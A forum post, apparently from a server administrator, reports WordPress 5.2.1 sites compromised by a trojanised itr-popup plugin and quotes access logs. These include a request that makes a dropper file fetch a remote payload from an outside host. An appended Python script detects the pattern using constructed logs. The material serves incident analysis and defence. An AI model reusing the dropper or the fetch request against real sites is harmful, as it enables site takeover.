Hello there,
I’m managing some servers and I’ve figured out that some WordPress sites (from different clients and different developers) are hacked a few days after their installation.
But the hacking methods are exactly the same in each case. This is what happens:
1. A user logs into WordPress on their first try (it seems there are no brute force attacks).
2. The logged-in user uploads a plugin named itr-popup.
Here are the logs:
202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
3. This plugin contains a file named itro-admin-scripts.php. This file accepts two parameters:
– url: the URL of a txt file that contains malicious code.
– dir: where to save this malware on the victim site.
With this method, the hacker uploads any files they want to the website and uses them to hack other websites as well.
These are the logs of how the hacker uploaded the scripts:
51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
Both sites that this happened to were using WordPress 5.2.1, and they made sure that they did not install this itr-popup plugin on their WordPress websites.
Please note that they are different clients and different developers on different servers.
I even downloaded this plugin from the WordPress repository and it was clean; the itro-admin-scripts.php file, which I said the hacker used to upload malware to the websites, is not included in the original version downloaded from WordPress.org. So, I believe it’s not a problem with this plugin.
I didn’t find any similar attack reports on the internet. Is anyone else having the same issue here? I worry that it’s some kind of bug in WordPress 5.2.1 itself.
Thank you for your help.
Iman
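Added example, not part of the post above: a small Python triage script that scans an Apache combined-format access log for the three-step pattern Iman describes (a login that succeeds with no preceding failed attempt, a plugin upload via update.php?action=upload-plugin shortly afterwards, and any request to a file named itro-admin-scripts.php, especially one carrying url= and dir= parameters). The sample log lines are constructed for the example (RFC 5737 test addresses, a placeholder download host) and only mirror the request sequence shown in the post; the rule names and the ten-minute window are the example's own choices.

```python
"""Access-log triage for the post's pattern: first-try login, plugin
upload, then hits on itro-admin-scripts.php.  Sample lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample: 203.0.113.10 reproduces the sequence from the post,
# 198.51.100.7 the later fetch, 192.0.2.44 is a legitimate user who mistypes once.
SAMPLE_LOG = """\
203.0.113.10 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0"
203.0.113.10 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0"
203.0.113.10 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0"
203.0.113.10 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0"
203.0.113.10 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0"
198.51.100.7 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://downloads.example.invalid/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0"
192.0.2.44 - - [23/May/2019:12:00:01 +0430] "POST /wp-login.php HTTP/1.0" 200 4102 "-" "Mozilla/5.0"
192.0.2.44 - - [23/May/2019:12:00:20 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0"
192.0.2.44 - - [23/May/2019:12:00:25 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    parts = urlsplit(e["target"])
    e["path"] = parts.path
    e["query"] = parse_qs(parts.query)
    return e


def analyze(log_text, window_minutes=10):
    """Return a list of findings, each {'ip', 'ts', 'rule', 'detail'}."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])  # the log in the post is not in time order
    failed_logins = defaultdict(int)
    first_try_login = {}
    findings = []

    def flag(e, rule, detail=""):
        findings.append({"ip": e["ip"], "ts": e["ts"].isoformat(), "rule": rule, "detail": detail})

    for e in events:
        ip, path, q = e["ip"], e["path"], e["query"]
        if e["method"] == "POST" and path == "/wp-login.php":
            if e["status"] == 302:
                # WordPress redirects (302) on a successful login and re-renders the
                # form (200) on a bad password, so "no earlier 200 POST from this IP"
                # approximates "logged in on the first try".  Heuristic, not proof.
                if failed_logins[ip] == 0:
                    first_try_login[ip] = e["ts"]
                    flag(e, "login_first_try")
            else:
                failed_logins[ip] += 1
        elif path == "/wp-admin/update.php" and q.get("action") == ["upload-plugin"]:
            t0 = first_try_login.get(ip)
            if t0 is not None and e["ts"] - t0 <= timedelta(minutes=window_minutes):
                flag(e, "first_try_login_then_plugin_upload",
                     f"{int((e['ts'] - t0).total_seconds())}s after login")
            else:
                flag(e, "plugin_upload")
        elif path.endswith("/itro-admin-scripts.php"):
            # The file is absent from the clean plugin, so any hit is worth a look;
            # url= plus dir= is the remote-fetch-and-write call from the post.
            if "url" in q and "dir" in q:
                flag(e, "dropper_fetch", f"fetch {q['url'][0]} into {q['dir'][0]}")
            else:
                flag(e, "dropper_access")
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:<14} {f['rule']:<36} {f['detail']}")
```

Run it against a real log with `analyze(open("access.log").read())`. The login heuristic is per-IP and ignores sessions that span log rotations, so treat it as a lead for checking the WordPress users table and wp-content/plugins/ on disk, not as a verdict. The constructed sample yields four findings: the first-try login, the upload 18 seconds later, the bare access to the dropper, and the later fetch from the second address; the legitimate user who failed once is not flagged.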